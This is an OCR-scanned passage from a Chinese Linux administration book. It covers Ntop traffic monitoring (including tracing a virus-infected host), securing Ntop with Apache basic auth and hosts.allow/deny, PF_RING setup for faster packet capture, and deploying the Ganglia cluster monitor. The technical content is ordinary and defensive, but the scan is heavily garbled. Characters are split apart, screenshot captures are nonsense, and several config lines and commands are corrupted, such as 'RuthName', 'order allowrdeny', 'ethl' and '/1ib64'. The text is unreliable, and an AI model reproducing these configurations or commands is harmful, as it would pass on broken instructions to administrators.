Switch Nic 按钮 让 其 生效 ， 生 效 后 我 们 就 可 以 方便 查看 流量 了 ， 如 图 10.25 所 示 。 


Global Traffic Statistics 


Name Device Type Speed MTU Header Address Ipv6 Addresses 
Network Interface(s) lo lo No link-layer encapsulation 8232| 4 127.0.0.1 
NetFlow-device |NetFlow-device Ethernet 1514| 14 |192 166.150.20 
Sampling Since Wed Sep 1 21:20:28 2011 [3days 11:58:20] 
Active End Nodes 49 


For device: `NetFlow-device.2` (current reporting device) 


Dropped (ntop) 00% 0 
Total Received (ntop) 10.816777 
Total Packets Processed 10816777 
Unicast 100.0% 10813.639 
Broadcast 00% 80 
Muticast 00% 3.058 


图 10.24 设置 参数 
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图 10.25 查看 流量 


(3) rrdPlugin: 用 于 生成 流量 图 。RRD 可 以 简单 的 说 是 MRTG 的 升级 版 ， 它 比 MRTG 
更 灵活 ， 更 适合 用 Shell、Perl 等 程序 来 调用 ， 生 成 所 要 的 图 片 。 


(4) sFlow: sFlow RFC 3176) 是 基于 标准 的 最 新 网 络 导出 协议 ， 能 够 解决 当前 网 络 管理 


人 员 面 临 的 很 多 问题 。sFlow 已 经 成 为 一 项 线 速 运行 的 “永远 在 线 ” 技 术 ， 可 以 将 sFlow 技术 杠 
入 到 网 络 路 由 器 和 交换 机 ASIC 芯片 中 。 与 使 用 镜像 端口 、 探 针 和 旁 路 监测 技术 的 传统 网 络 监视 
解决 方案 相 比 ，sFlow 能 够 明显 地 降低 实施 费用 ， 同 时 可 以 使 面向 每 一 个 端口 的 全 企业 网 络 监视 
解决 方案 成 为 可 能 。 与 数据 包 采 样 技术 〈 如 RMON) 不 同 ，sFlow 是 一 种 导出 格式 ， 它 增加 了 关 
于 被 监视 数据 包 的 更 多 信息 ， 并 使 用 嵌入 到 网 络 设备 中 的 sFlow 代理 转发 被 采样 数据 包 ， 
功能 和 性 能 上 都 超越 了 当前 使 用 的 RMON、RMON I 和 NetFlow 技术 。sFlow 技术 的 独特 之 处 在 
于 它 能 够 在 整个 网 络 中 ， 以 连续 实时 的 方式 监视 每 一 个 端口 ， 但 不 需要 镜像 监视 端口 ， 对 整个 网 


络 性 能 的 影响 也 非常 小 。 


因此 在 


(5) 手机 插件 : 这 个 功能 很 有 意思 , 我 们 可 以 用 智能 手机 , 随时 随地 监控 我 们 的 网 络 ， 


如 图 10.26 所 示 。 


Multicast = 1566 人 8 39 


图 10.26 手机 插件 
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接 下 来 我 们 一 起 学 习 如 何 利 用 Ntop 为 我 们 提供 的 流量 分 析 功 能 ， 解 决 内 网 安全 。 某 天 上 
班 时 间 ， 网络 性 能 突然 下 降 ， 导 致 不 少 用 户 无 法 上 网 传输 文件 。 首先 怀疑 是 设备 故障 ， 后 来 又 
查找 了 线路 是 否 有 问题 ,但 都 能 ping 通 从 而 一 一 排除 ， 随 后 在 Ntop 检测 的 “ 卫 协议 ”菜单 中 
发 现 网 络 负荷 维持 在 95% 以 上 。 在 “Network Traffic:Data Sent” 图 表 中 显示 局 域 网 中 一 台 机 器 
发 送 大 量 的 数据 包 ， 这 台 机 器 的 IP 地 址 和 MAC 也 能 找到 。 基 本 能 断定 这 台 机 器 中 了 病毒 在 
发 送 大 量 的 UDP 包 , 从 而 造成 了 广播 风暴 , 导致 网 络 性 能 急速 下 降 , 如 图 10.27 所 示 , 是 Ntop 
捕捉 到 的 随机 发 送 的 地 址 列表 。 找 到 故障 节点 后 ， 随 后 根据 MAC-PP- 墙 点 的 对 应 ， 及 时 将 这 
台 机 器 隔离 出 网 络 进行 杀毒 处 理 . 在 1.9 节 中 讲述 的 当 网 站 遭遇 DDOS 攻击 时 我 们 同样 可 以 利 
用 Ntop 和 Ossim 平台 提供 的 流量 监控 功能 发 现 一 些 蛛丝马迹 。 


Host Information 
Location| IP Address [MAC Address|Community| Other Name(:s) Gandwidth Nw Board Ver 
|29.211.59.166 外 四 29.211.59.166| 
|178.50.100.102 全 是 178.50.100.102 
|192 1551 60 外 加 192.155.1.60| 
|198.128.13.18 入 由 198128.13.18| 
156.133.113.31 人 @ 吕 56133113.31 
6811 136 1 和 @ 台 68111361 
192.29.0.25 @ 197 39035 
|19z 25 128.23 外 中 192.25.128.23 
|96.3.192.45 笑 了 96.3.192.45 
1192.154.129.1 图 可 102154 1201 
| as si 168 148 外 加 15.81.168.148 
192.168.1 108 1sz1581.108 
181.113.34.221 鲁 中 51.113.34.221 
[192.168.129.21 192.168.129.21 
192 168 129 27 192 168129.22 
192.6.0.66 加 5 1926066 
|z15 75.174.216 外 四 215.75.174.216| 


图 10.27 ”病毒 随机 发 送 数据 包 列 表 


10.4.5 优化 Ntop 


1. Web 访问 认证 加 固 Ntop 
默认 情况 下 ， 编 译 Apache 时 将 自动 加 载 mod_auth 模块 ， 利 用 此 模块 可 以 实现 “用 户 名 + 
密码 ”以 文本 文件 方式 存储 的 认证 功能 。 
(1) 修改 Apache 的 配置 文件 /usr/local/apache/conf/httpd.conf， 对 认证 资源 所 在 的 目录 设 
定 配 置 命 令 。 


下 例 是 对 /sr/local/apache/htdocs/ntop 目录 的 配置 : 


<Directory /usr/local/apache/htdocs/ntop> 
Options Indexes FollowSymLinks 
allowoverride authconfig # 表 示人 允许 对 /usr/1local/apache/htdocs/ntop 目录 下 的 文 
件 进行 用 户 认证 # 
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order allowrdeny 
allow from all 
</Directory> 


(2) 在 限制 访问 的 目录 /usr/local/apache/htdocs/ntop 下 建立 一 个 文件 .htaccess， 其 内 容 
如 下 : 


RuthName "" 

AuthType basic 
AuthUserFile/usr/local/apache/ntop.txt 
require ntop #ntop 用 户 可 以 访问 # 


(3) 利用 Apache 附带 的 程序 htpasswd， 生 成 包含 用 户 名 和 密码 的 文本 文件 : 
/usr/local/apache/ntop.txt， 每 行内 容 格式 为 “用 户 名 :密码 ”: 


#cd /usr/local/apache/bin 
#htpasswd -bc ../ntop.txt userl 234xyx14 


和 欲 了 解 htpasswd 程序 的 帮助 ， 请 执行 htpasswd -h。 


(4) 重新 启动 Apache 服务 器 ， 然 后 在 浏览 器 中 输入 localhost 访问 新 建 的 站 点 。 这 时 就 
会 要 求 输入 用 户 名 和 密码 。 
2. 对 Ntop 的 访问 进行 控制 


# vim /etc/hosts.allow 

ntop: 192.168.0.10 // 只 允许 192.168.0.10 主机 Ntop 服务 
# vim /etc/hosts.deny 

ntop: ALL 


通过 上 面 的 学 习 ， 我 们 能 通过 使 用 Ntop 对 所 有 网 络 进出 流量 数据 进行 非常 详细 的 分 析 ， 
做 到 了 如 指 掌 。 
当 你 的 ethl 用 于 连接 内 网 时 ， 如 何 更 改 Ntop 启动 后 监测 的 是 ethl 而 不 是 eth0? 在 这 里 ， 
提供 两 个 解决 方法 : 
(1) 修改 Ntop 配置 文件 ， 重 启 Ntop 即 可 : 


root@netren# vim /var/lib/ntop/init.cfg 
USER="ntop" 
INTERFACES="eth0O™" ( 改 为 : INTERFACES="ethl1") 
(2) 利用 命令 方式 启动 Nop， 指 定 网 卡 ethl: 
root@netren# ntop -u ntop -i ethl 
这 里 使 用 Ntop 用 户 启动 Ntop 命令 ， 并 且 -i 指定 了 网 卡 接口 为 ethl。 
3. 提升 Ntop 的 性 能 
Ntop 或 是 第 7 章 提 到 的 Snort， 它 们 的 抓 包 分 析 都 是 自己 完成 的 ， 但 它们 都 通过 libpcap 
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来 抓 包 ， 且 速度 不 能 超过 100M。 分 析 一 下 libpcap 的 流程 ， 我 们 会 明白 ， 首 先 数据 包 通 过 的 
路 径 为 网 卡 硬 中 断 一 软 中 断 一 内 核 协议 栈 一 系统 调用 一 Socket 接口 一 libpcap 接口 一 用 户 应 用 
程序 ， 在 这 个 流程 中 ， 可 以 看 出 数据 的 copy 比较 多 ， 所 以 ， 在 高 速率 下 libpcap 抓 包 技 包 严 
重 也 不 用 感到 奇怪 了 。 对 于 千 兆 的 网 络 就 需要 采用 PF_RING 技术 来 接收 数据 包 了 ，PF_RING 
运行 于 Linux 的 内 核 层 ， 体 系 结构 图 如 图 10.28 所 示 。 它 采用 类 似 零 复制 技术 ， 且 它 从 网 卡 获 
取 数 据 的 速度 比 libpcap 有 成 倍 的 提高 ，PF_RING 在 干 兆 环境 下 几乎 不 丢 包 。 


Multithreaded NAPI 


图 10.28 PF_RING 结构 图 
对 于 内 核 的 修改 ， 可 以 使 用 下 面 的 方法 。 首 先 给 内 核 源码 打 补 丁 ， 主 要 步骤 如 下 。 


四 zcat linux-2.6.25-1-686-smp-PF RING.patch.gz | patch -p0。 
到 /usr/src/ 目 录 下 的 linux-2.6.25 目录 中 ， 编 辑 Makefile， 在 这 个 地 方 加 上 一 个 自 定义 
的 后 级 ( 比如 -PF_RING ) : 


EXTRAVERSION = -PF RING 
make menuconfig. 
这 里 按 y 选中 PF_RING， 然 后 保存 修改 到 .config 退出 ， 如 图 10.29 所 示 。 


图 10.29 选中 PF_RING 


然后 就 开始 编译 内 核 : 


“358。 


主机 监控 应 用 案例 第 10 齐 


make 
make modules // 安 装 编译 好 的 modules 
make install 


注意 : 将 bzImage 添加 到 grub 中 ， 以 便 使 用 新 内 核 启动 ， 且 新 添加 的 内 核 不 是 默认 启动 
项 。 推 荐 使 用 make install， 可 以 免 去 手动 复制 bzImage 并 生成 initrd 的 繁琐 过 程 。 


进入 libpcap-1.1.1-ring 目录 下 ， 修 改 源 代码 ， 将 pf ring 的 内 核 ring 缓冲 区 设 为 2MB， 默 
认 0.SMB， 然 后 修改 MakeFile， 将 安装 目录 指向 usr， 默 认 指向 usrlocal。 接 着 编译 make， 
后 make install; 这 样 ， 就 将 libpfring.so、pfring e1000e dna.h、pfring.h、libpfring.a 复制 到 了 
usr/include 或 usr/lib 下 ， 同 时 用 libpcap-1.1.1-ring 的 库 文件 蔡 换 了 原来 的 libpcap 库 文件 。 

如 果 大 家 觉得 这 种 修改 内 核 的 方法 比较 复杂 , 下 面 推荐 一 个 简单 的 方法 : 到 www.ntop.org 
网 站 下 载 PF_RING-5.1.0.tar.gz 包 , 解 开 PF RING 以 独立 模块 运行 就 成 了 , 没有 必要 打 patch 
到 内 核 ， 直 接 make 就 可 以 。 


#insmod ./pf_ring.ko  # 加 载 模块 
# dmesg grep RING 


PF_RING] Welcome to PF RING 3.9.3 # 这 一 部 分 是 PF_RING 初始 化 时 输出 的 
PF RING] Ring slots 4096 

PF _RING] Slot version C1 

PF_RING] Capture TX Yes [RX+TX] 


PF_RING] IP Defragment No 

PF_RING] Initialized correctly 

PF RING] registered /proc/net/pf ring/ 

PF_RING] successfully allocated 815104 bytes at Oxd0ad4000 


以 后 每 次 运行 PF_RING 程序 ， 会 输出 这 样 的 调试 信息 : 


PF_RING] allocated 4115 slots [slot len=198] [tot mem=815104] 
PF_RING] removed /proc/net/pf ring/2849-eth0.0 


注意 : 刚 启动 机 器 时 ，ls /proc/net/pf ring/ 是 看 不 到 这 个 目录 的 ， 只 有 当 需 要 PF_RING 
的 程序 第 一 次 运行 时 ， 才 会 生成 这 个 目录 以 及 一 个 info 文件 。 


安装 完成 后 在 Shell 下 输入 如 下 命令 ， 即 可 验证 是 否 配置 成 功 ， 参 见 图 10.30。 


#dmesg 1grep PF_RING 


t filtering [1] 


agnent 
Initialize 


图 10.30 路 径 是 否 配 置 成 功 
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Ntop 可 以 监测 的 数据 包括 : 网 络 流量 、 使 用 协议 、 系 统 负载 、 端 口 情况 、 数 据 包 发 送 时 
间 等 。Ntop 能 够 更 加 直观 地 将 网 络 使 用 量 的 情况 以 及 每 个 节点 计算 机 的 网 络 带 宽 使 用 的 详细 
情况 显示 出 来 。 它 是 一 种 网 络 嗅 探 器 ， 嗅 探 器 在 协助 监测 网 络 数据 传输 、 排 除 网 络 故障 等 方面 
有 着 不 可 蔡 代 的 作用 。 可 以 通过 分 析 网 络 流量 来 确定 网 络 上 存在 的 各 种 问题 , 如 瓶颈 效应 或 性 
能 下 降 ; 也 可 以 用 来 判断 是 否 有 黑客 正在 攻击 网 络 系统 。 如 果 怀 疑 网 络 正在 遭受 攻击 , 通过 嗅 
探 器 截获 的 数据 包 可 以 确定 正在 攻击 系统 的 是 什么 类 型 的 数据 包 , 以 及 它们 的 源头 , 从 而 可 以 
及 时 地 做 出 响应 ， 或 者 对 网 络 进行 相应 的 调整 ， 以 保证 网 络 运行 的 效率 和 安全 。 通 过 Ntop， 
网 管 员 还 可 以 很 方便 地 确定 出 哪些 通信 和 量 属 于 某 个 特定 的 网 络 协议 、 占 主要 通信 和 量 的 是 哪个 主 
机 、 每 次 通信 的 目标 是 哪个 主机 、 数 据 包 发 送 时 间 、 各 主机 间 数 据 包 传递 的 间隔 时 间 等 。 这些 
信息 为 网 管 员 判 断 网 络 问 题 及 优化 网 络 性 能 ， 提 供 了 十 分 宝贵 的 信息 。 

通过 它 , 基本 上 所 有 进出 数据 都 无 所 授 形 , 不 管 拿 来 做 例 行 的 网 络 监测 工作 , 还 是 拿 来 做 
报告 ， 都 是 非常 优秀 的 工具 ,让 你 的 网 络 流量 透明 化 。 它 工作 的 时 候 就 像 一 部 被 动 声 纳 ， 默默 
的 接收 看 来 自 网 络 的 各 种 信息 , 通过 对 这 些 数据 的 分 析 , 网 络 管理 员 可 以 深入 了 解 网 络 当前 的 
运行 状况 。 


10.5 基于 Linux 的 集群 监控 系统 


本 书 第 5 章 对 几 个 典型 的 集群 系统 搭建 进行 了 详细 讲解 , 一旦 搭建 好 了 集群 系统 并 进入 生 
产 环境 , 就 需要 一 套 可 视 化 的 工具 来 监视 集群 系统 , 这 将 有 助 于 我 们 迅速 地 了 解 集群 的 整体 配 
置 情况 , 准确 地 把 握 集群 各 个 监控 节点 的 信息 , 全 面 地 察看 监控 节点 的 性 能 指标 ,使 集群 系统 
具有 较 高 的 管理 性 。 监视 系统 的 主要 目标 是 从 各 个 监控 节点 采集 监控 信息 , 如 CPU 温度 、CPU 
利用 率 、 用 户 数 、 进 程 数 、 内 存 利用 率 等 ， 然 后 将 获取 的 监控 信息 汇集 起 来 ， 便 于 综合 分 析 和 
处 理 ， 最 后 根据 分 析 和 处 理 的 结果 做 出 相应 的 决策 。 本 文 以 占用 系统 资源 最 少 的 、 开 放 源 代码 
的 Ganglia 为 平台 ， 详 细 讲 解 了 如 何 搭建 一 个 具有 更 高 可 靠 性 的 集群 监控 系统 。 

Ganglia 监控 系统 是 由 加 州 大 学 伯克利 分 校 开发 的 ， 用 于 大 规模 的 集群 和 分 布 式 网 格 等 高 
性 能 计算 系统 。 基于 XML 技术 的 数据 传递 可 以 使 系统 的 状态 数据 跨越 不 同 的 系统 平台 进行 交 
互 ， 采 用 简洁 紧凑 的 XDR 方式 ， 实 现 监控 数据 压缩 和 传输 。Ganglia 主要 由 gmetad 和 gmond 
两 部 分 组 成 : 


@ gmetad 主要 负责 监控 数据 的 汇集 ， 每 隔 15 秒 会 轮 询 gmond， 并 向 下 层 节点 发 送 和 接 
收 用 户 所 需 的 监控 信息 ， 并 对 数据 出 错 做 出 相应 处 理 ， 最 后 使 用 RRDtool 将 这 些 信息 
存储 在 数据 库 ， 并 通过 Apache Web 服务 器 显示 它 收集 的 信息 。 

@ gmond 则 工作 在 每 个 集群 节点 上 ， 主 要 负责 监控 节点 信息 的 获取 ， 相 当 于 Ganglia 的 
监视 守护 进程 。 

gmond 主要 负责 监控 节点 信息 的 获取 。 首 先 ， 初 始 化 gmond.conf 文件 配置 项 信息 ， 同 时 

分 配 监控 信息 存储 空间 。 其 次 ， 调 用 ganglia_metric_cb_define("mem total"'，mem total func)， 
定义 监控 信息 的 采集 项 ，mem _ total 表示 信息 采集 项 ,mem total fun 为 信息 采集 函数 ， 该 采集 
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函数 从 /proc 中 读 取 所 需 采 集 项 信息 ， 所 有 获取 的 监控 信息 以 hash 链表 的 形式 存储 。 然 后 ， 在 
每 个 gmond 节点 上 创建 UDP 通信 的 Socket 端口 , 并 调用 connect 建立 各 gmond 节点 间 的 通信 
通道 ， 并 启动 监听 进程 process_udp_recv_channel， 通 过 recvfrom 接收 其 他 各 监控 节点 发 来 的 
监控 信息 。 

Ganglia_udp_send_message 通过 调用 write 向 各 个 监控 节点 发 送 监 控 信 息 ， 监 控 信 息 的 传 
输 采 用 XDR 数据 流 格式 ， 每 个 监控 节点 包含 了 区 域内 所 有 其 他 节点 的 监控 信息 ， 如 图 10.31 
所 示 。 当 更 新 周期 到 来 时 ， 各 监控 节点 gmond 将 其 获取 的 监控 信息 发 给 gmetad 端 。 


图 10.31 Ganglia 监控 体系 结构 


10.5.1 安装 准备 


上 文 我 们 简单 讲解 了 Ganglia 是 如 何 工作 的 ， 下 面 将 讨论 Ganglia Web 的 安装 配置 。 
首先 ， 在 集群 节点 上 安装 gmond， 然 后 在 集群 节点 管理 器 上 安装 gmetad 和 Ganglia Web 
软件 包 。 准 备 工 作 如 下 : 


@ 安装 Apache、PHP。Ganglia Web 软件 包 需 要 Apache、PHP 支持 ， 有 具体 安装 方法 我 们 
在 第 1 章 已 详细 讨论 过 。 

@ 安装 RRDtool。RRDtool 可 以 绘 出 有 用 的 图 表 ， 用 来 显示 处 理 的 数据 。 具体 安装 方法 
我 们 在 讨论 Ntop 一 节 时 ， 已 详细 讲述 ， 参 看 本 章 10.4 节 内 容 。 


10.5.2 ”集群 节点 管理 器 部 署 Ganglia 


在 准备 工作 完成 以 后 , 我 们 首先 需要 在 http://sourceforge.net/projects/ganglia/ 下 载 最 新 软件 
进行 安装 ， 为 方便 安装 可 以 选择 RPM 包 方 式 进行 安装 ， 必 须 安装 的 软件 包 名 称 为 : 
ganglia-gmetad、ganglia-gmond、ganglia-web 以 及 ganglia-devel。 


注意 : 在 安装 上 述 RPM 包 时 ， 如 果 有 的 系统 需要 强制 安装 ， 就 要 用 到 nodeps 参数 。 


1. 配置 Ganglia 


安装 了 这 些 软件 ， 下 面 是 配置 Ganglia 的 时 候 了 ， 这 里 从 集群 节点 管理 器 上 的 gmetad 和 
gmond 开始 。 在 /etc/ganglia 目录 下 分 别 有 它 们 的 配置 文件 : gmetad.conf 和 gmond.conf。 
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在 集群 节点 上 的 /etc/ganglia/gmetad.conf 文件 ， 只 须 包 含 指定 集群 名 称 和 集群 内 部 节点 名 
称 ， 例 如 : 


Data source "my cluster" localhos nodel node2 node3 


“my cluster” 代 表 集 群 名 称 ， 并 设置 了 localhost〈 集 群 节点 管理 器 ) 和 3 个 名 为 nodel、 
node2 和 node3 的 节点 。 由 于 Ganglia 通信 使 用 多 播 (在 配置 文件 gmond.conf 中 定义 多 播 地 址 
为 : 239.2.11.71) ， 所 以 列表 中 的 一 个 节点 失败 (有 时 候 很 可 能 是 用 户 修改 了 节点 名 称 ) 不 会 
影响 它 连接 的 下 一 个 节点 , 因此 我 们 不 必 在 集群 中 为 每 个 data_source 项 指定 每 台 主机 的 信息 。 

上 述 配 置 完成 后 ， 记 得 要 重启 gmetad 服务 : 


#service gmetad restart 


2. 在 集群 节点 上 安装 最 新 的 ganglia-gmond 包 并 配置 gmond 


#vi /etc/gmond.conf 
找到 以 下 部 分 并 按照 所 给 出 的 例子 进行 配置 : 


tcp accept channel { 

port = 8651/* 注 释 : 此 为 端口 号 ， 通 过 它 来 传送 系统 信息 。 注 意 要 和 服务 器 端 监听 的 端口 一 致 。*/ 
acl { 

default = "deny" 

access { 

ip = 192.168.X.X  /* 注 释 : 这 里 是 服务 器 的 IP 地址 */ 

mask = 32 

action = "allow" 


} 
重启 gmond 服务 : 


#service gmond restart 


注意 : 在 对 gmond.conf 和 gmetad.conf 文件 做 了 修改 或 是 修改 了 节点 计算 机 名 ， 都 需要 重 
启 这 两 个 进程 。 


3. 测试 gmond 进程 
我 们 可 以 通过 telnet 来 测试 gmond 是 否 工作 正常 ， 输 入 如 下 命令 ， 如 图 10.32 所 示 。 


#telnet 127.0.0.1 8651 
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einet Localhost 8651 


rmying 127-6.8.1 
onnected to localhost 
Escape character is ~ 
pxmt version="1 F150-8859-1" standalone="yes"?> 
CTYPE GANGLIA XML [ 
<1ELENENT GANGLIA XML (GRID|CLUSTER|HOST) *> 
<1ATTLIST GANGLIA_XML VERSION CDATA #REQUIRED> 
<!ATTLIST GANGLIA_ XML SOURCE CDATA #REQUIRED> 
‘<ELEMENT GRID (CLUSTER | GRID | HOSTS | METRICS)*> 
<!ATTLIST GRID NAME CDATA #REQUIRED> 
<!ATTLIST GRID AUTHORITY CDATA #REOUIRED> 


<!ATTLIST GRID LOCALTINE CDATA #IMPLIED> 
‘<ELEMENT CLUSTER (HOST | HOSTS | METRICS)*> 
<!ATTLIST CLUSTER NAME CDATA 和 REOUTREI 
<!ATTLIST CLUSTER OWNER CDATA #IMPLIEI 
<IATTLIST CLUSTER LATLONG CDATA #TMPLIED> 
<IATTLIST CLUSTER URL CDATA #TMPLIED> 
<1ATTLIST CLUSTER LOCALTIME CDATA #REQUIRED> 
<IELEMENT HOST (METRIC)*> 
<IATTLIST HOST NAME CDATA #REQUIRED> 
<IATTLIST HOST JP CDATA #REQUIRED> 
<IATTLIST HOST LOCATION CDATA #IMPLIED> 
<IATTLIST HOST REPORTED CDATA 4REQU 
<IATTLIST HOST TN CDATA #INPLIED> 
<IATTLIST HOST TMAX CDATA #IMPLIED> 
<4ATTLIST HOST DRAX CDATA #IMPLIED> 
<!ATTLIST HOST GMOND_STARTED CDATA #INPLIED> 
‘<ELEMENT METRIC (EXTRA_DATA*)> 
<4ATTLIST METRIC NAME CDATA HREOUIRED> 
<!ATTLIST METRIC VAL CDATA #REQUIRED> 
IATTLIST METRIC TYPE [string | int8 | uint8 
TTLIST METRIC UNITS CDATA #1MPLIED> 
<IATTLIST METRIC TH CDATA #TMPLIED> B 
<IATTLIST METRIC THAX CDATA #TMPLIED> 
<IATTLIST METRIC OMAX CDATA #IMPLIED> 
SLOPE (zero | positive | negative | both | unspecified) #IMPLIED> 
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图 10.32 测试 gmond 


int15 | uint16 | int32 | uint32 | float | double | tinestanp) 4REQUIRED> 


这 时 按 下 回 车 键 ， 将 通过 端口 8651 发 送 XML 代码 到 集群 节点 管理 器 上 的 gmond 守护 进 
程 ， 而 gmetad 守护 进程 使 用 RRDtool 将 这 些 信息 存储 在 /var/lib/ganglia/rrds 目录 下 。 需 要 注意 
的 是 ，rrds 目录 下 及 子 目录 比较 多 ， 如 果 监 控 的 集群 节点 数 大 于 50 个 节点 ， 建 议 将 此 目录 放 
在 内 存 文件 系统 上 ， 以 减 小 磁盘 IO 。 如 果 告 知 gmond 压缩 的 XML 数据 (在 
/etc/ganglia/gmond.conf 文件 中 定义 ) ， 将 需要 使 用 netcat 来 解压 缩 该 XML 数据 ， 使 其 可 以 识 


别 。 命 令 为 : nc localhost 8651 |gunzip。 


4. 节点 机 软件 安装 


在 部 署 节 点 时 ， 不 需要 安装 软件 ， 仅 仅 执行 以 下 命令 将 文件 复制 过 去 即 可 。 


pscp /usr/sbin/gmond nodel:/usr/sbin/gmond 

psh nodel mkdir -p /etc/ganglia/ 

pscp /etc/ganglia/gmond.conf nodel:/etc/ganglia/ 

pscp /etc/init.d/gmond nodel:/etc/init.d/ 

pscp /usr/1lib64/1ibganglia-3-1.7.so.0 nodel:/usr/1lib64/ 
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pscp /1ib64/libexpat.so.0 nodel:/1ib64/ 

pscp /usr/1ib64/libconfuse.so.0 nodel:/usr/1ib64/ 
pscp /usr/1ib64/libapr-1.so.0 nodel:/usr/1lib64/ 
pscp -r /usr/libé64/ganglia nodel:/usr/1ib64/ 


psh nodel service gmond start 


5. 添加 Ganglia 页 面 到 Apache 


ganglia-webfront 这 个 包 默 认 将 Web 相关 的 代码 安装 在 “/usr/share/ganglia-webfrontend/” 
路 径 下 ， 这 样 Apache 访问 不 到 。 可 以 直接 将 目录 移 到 “/var/www/” 目 录 下 ， 或 修改 Apache 
的 DocumentRoot 路 径 ， 一 旦 完成 修改 需要 重启 Apache。 

测试 是 否 成 功 ， 可 以 在 浏览 器 地 址 栏 里 输入 http://localhost/ganglia， 如 图 10.33 和 图 
10.34 所 示 。 


| vm 
Ganglia 


cgweb-virtual-machine Host Report for Wed, 02 Nov 2011 07:22:05 +0800 Ces Fresh Dota 
Last ho Node View 


Grid > unspeclfled > cgweb-virtual-machine 


cgweb-virtual-machine Overview 


目 gwb .mirtustmachine Losd Last hour 
This host 15 up and running. 


Time and String Metrics 
Tue, 01 Nov 2011 22:21:11 +0800 
OFF EX acy | 
Tue, 01 Nov 2011 22:21:22 +0800 lain Leel Bo Nning precems 
0days 0:00:17 
x86 54 
Linux 
2.6.35-22 generic 
Odays, 9:00:53 


cqeeb- rirtusl- nachine Merory Last hour 


Constant Metrics 
4 CPUs 
3502 MHz 
2053472 KB 
5152764 KB 


uer 
DifNe ou 


egweb- virtual -machine Metvorh last hour 


Sr mr 


图 10.33 ”Ganglia 页 面 测试 结果 1 


主机 监控 应 用 案例 第 10 党 


图 10.34 ”Ganglia 页 面 测 试 结果 2 
6. Ganglia Web 软件 包 


Ganglia Web 允许 你 查看 存储 在 RRDtool 循环 数据 库 中 的 性 能 度量 的 快照 。Ganglia Web 
软件 包 分 成 两 部 分 : 标题 和 节点 快照 ， 如 图 10.35 和 图 10.36 所 示 。 下 面 结合 一 个 集群 的 实例 
进行 讲解 。 

UC Berkeley Grid Report for Tue, 01 Nov 2011 16:42:10 -0700 


| Sorted oscondng 


- day 
ld > -Chooseweek 


UC Berkeley 


UC Berkeley Grid (6 sourees) eee 

CPUs Totat 221 Uc Berkeley Grid Load last hour Uc Borkeley Grid Menory Last hour 
Hoss mp $4 总 

Hosts dowr: 22 


Lalores 


人 写 0 寺 尖 人 
日 -win Lead 目 hades cps ming 


Infrastructure Grid Load last hour 


昌 
e 
2011110116 权 二 Ey Ed 
日 1-win Lood Nedes OU Ps orning Processe 
PSI Claster grit in 
CPUs Totat 846 Pa Cluster Load last hour 


PS Cluster Nerory Last hour 


Hoss tp 106 OCC 
Hacte dn 了 昌 一 
图 10.35 标题 
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Cluster Report for Tue, 01 Nov 2011 19:36:30 -0700 Get Fresh Data 


Metric [losd_one 司 Last [how 司 Sorted [sescendre 司 Physical View 


> 13 Cluster > [ChocseaNode 习 


Overview of I3 Cluster 


CPUs 30 I3 Cluster Load last hour I3 Cluster CPU last hour 
Totmk 一 一 一 一 
Hostsup: 12 | 
Hosts 
de 
Ee En ED 
A 05 sr CPU ”日 Nice CPU 国 Systen CPU 国 WAIT CPU 
$5, Im): CPU 
2%, 4%, 5% 
Localime. I3 Cluster Network Last hour 
2011-11-01 加 十 
2 二 
Joblist 
加 EE 
Memory cached 
peony svapped i | 
国 out 


图 10.36 节点 快照 


默认 情况 下 ,软件 包 使 用 Full View 显示 集群 信息 ， 单 击 PhysicalView 链接 以 便 查看 不 同 
格式 的 相同 数据 。 如 果 需 要 刷新 数据 ， 单 击 Get Fresh Data 按钮 ， 默 认 的 刷新 时 间 是 300s， 可 
以 编辑 config.php 文件 自行 修改 。 

在 Last 下 拉 列表 中 可 以 选择 长 达 一 年 的 有 价值 数据 。Metric 下 拉 列 表 中 可 以 选取 手机 的 
性 能 度量 ， 默 认 的 是 load_one， 它 代表 集群 节点 上 的 一 分 钟 平均 负载 (Load Average) 。 除 此 
之 外 ， 还 有 bootime、byte、cpu、disk、lastsync、mem、network、nfs、swap 等 度量 信息 。 

现在 来 详细 分 析 load_one 的 性 能 度量 。 


7. 平均 负载 


在 内 核 中 ， 基 于 当前 的 系统 负载 ，1min、5min、15min 平均 负载 ， 每 5s 自动 更 新 计算 。 
当前 的 系统 负载 是 运行 在 系统 上 的 进程 的 数量 加 上 等 待 运行 进程 数量 之 和 ， 也 就 是 说 它 是 
TASK_RUNNING 和 TASK_UNINTERRUPTIBLE 状态 中 进程 之 和 。 


注意 : Load Average 就 是 一 段 时 间 (lmin、5min、15min〉 内 的 平均 Load， 在 每 台 Linux 
节点 下 可 以 通过 w、uptime、procinfo、top 等 命令 查看 。 我 们 通过 这 些 信息 就 能 判断 集群 系统 
是 否 已 经 过 载 (Over Load) 。 


关于 一 些 错误 的 认识 问题 ， 系 统 Load 高 一 定 是 性 能 有 问题 、CPU 能 力 问 题 或 是 数量 不 够 
吗 ? 集群 系统 中 Load 数值 比较 高 也 许 是 因为 在 进行 CPU 密集 型 计算 ,或 是 代表 需要 运行 的 队 
列 累计 过 多 了 ， 但 队列 中 的 任务 实际 可 能 是 耗 CPU 的 ， 也 可 能 是 耗 IO 等 其 他 因素 的 。 

如 果 单 击 Ganglia Web 显示 的 节点 ， 将 会 显示 Host Report 页 面 ， 如 图 10.37 所 示 。 
10.38 显示 了 集群 节点 上 的 CPU 负载 、 内 存 的 利用 情况 , 同时 也 列 出 了 集群 节点 上 的 Linux 
内 核 版 本 。 
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Host Report for Tue, 01 Nov 2011 23:30:51 -0700 sareshoas | 习 
Tast [Pow 司 Node View 
13 Cluster > 11,Millennium.Berkeley. EDU 


ilMillennium Berkeley EDU Overview 
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本 节 详 细 介 绍 了 Ganglia 软件 包 的 架构 、 安 装 方法 以 及 Ganglia Web 的 配置 ， 在 长 期 使 用 
中 ， 笔 者 发 现 Ganglia 也 存在 一 些 问题 ， 例 如 : 没有 实现 对 被 监控 数据 依 权限 查看 ， 只 有 监视 
而 没有 必需 的 控制 功能 ; 没有 实现 更 有 弹性 的 、 依据 用 户 策略 监控 数据 的 选择 性 提取 和 汇集 等 
问题 。 因 此 ， 笔 者 提出 了 如 下 改进 计划 : 首先 ,为 了 帮助 管理 人 员 发 现 集群 中 存在 的 问题 , 更 
及 时 ， 更 容易 地 处 理 集群 故障 ， 可 在 原 Ganglia 系统 中 增加 告警 机 制 模块 。 该 告警 机 制 分 别 对 
集群 中 节点 《〈 主 机 ) 的 各 种 运行 参数 进行 定时 地 统计 监测 ， 包 括 CPU 平均 使 用 率 越界 告警 、 
